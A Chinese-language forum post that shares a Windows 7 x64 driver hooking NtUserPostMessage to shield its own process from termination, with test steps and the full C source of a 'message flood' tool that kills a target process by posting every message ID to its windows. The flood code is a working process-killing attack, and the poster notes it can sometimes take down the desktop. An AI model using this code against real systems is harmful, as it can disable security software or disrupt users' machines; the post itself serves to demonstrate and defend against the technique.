|
放个BIN给大家玩玩吧,仅支持WIN7 X64。。。还是那句话,驱动无花无壳,可以轻易放进IDA里逆。。。
测试方法:
1.运行MyDriver.exe,再运行KillProcessByPostMessage.exe,在KillProcessByPostMessage里输入MyDriver.exe的PID,发现MyDriver.exe被K掉;
2.打开DBGVIEW,再次运行MyDriver.exe,点击“加驱动”,点击HOOK,会发现DBGVIEW里慢速出现『OriNtUserPostMessage called!』;
3.在KillProcessByPostMessage里输入MyDriver.exe的PID,发现MyDriver.exe没被K掉了,DBGVIEW里快速出现『Do not fuck with me!』;
4.点击UNHOOK,在KillProcessByPostMessage里输入MyDriver.exe的PID,发现MyDriver.exe又被K掉了。。。
PS:
1.发现MyDriver.exe被K掉后即可关闭KillProcessByPostMessage.exe,因为消息洪水的速度比较慢,等彻底循环完可能要等较长的时间(代码在下面,你看了后就知道我为什么这么说了)。。。
2.偶尔情况下KillProcessByPostMessage.exe会导致explorer.exe的界面消失(桌面消失),但不会蓝屏。。。
消息洪水攻击的代码(CodeBlocks编译):
- #include <stdio.h>
- #include <stdlib.h>
- #include <windows.h>
- int main()
- {
- DWORD pid,wpid,i,j;
- HWND hWnd;
- st:
- system("cls");
- printf("Input pid: ");
- scanf("%ld",&pid);
- for(i=100;i<0xffffff;i+=2)
- {
- GetWindowThreadProcessId(i,&wpid);
- if(wpid==pid)
- {
- hWnd=i;
- for(j=0;j<0xffff;j++)
- {
- PostMessage(hWnd,j,0,0);
- }
- }
- }
- printf("OK!");
- getchar();
- getchar();
- goto st;
- return 0;
- }
复制代码 |
|